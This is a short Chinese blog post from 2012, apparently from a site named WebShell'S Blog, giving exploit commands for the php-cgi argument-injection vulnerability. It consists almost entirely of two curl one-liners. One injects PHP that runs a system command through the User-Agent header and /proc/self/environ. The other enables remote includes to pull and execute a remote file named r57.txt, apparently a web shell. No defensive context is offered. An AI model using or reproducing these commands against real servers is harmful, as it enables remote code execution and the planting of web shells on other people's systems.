php-cgi漏洞利用EXP

2012-05-15
安全
暂无评论
1.98K次阅读

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl https://www.webshell.cc/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttps://www.webshell.cc/r57.txt

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/3599.html

添加新评论

上一篇: 无忧无忧网络文章管理系统（5UCMS）注入漏洞
下一篇: 可突破安全狗的aspx一句话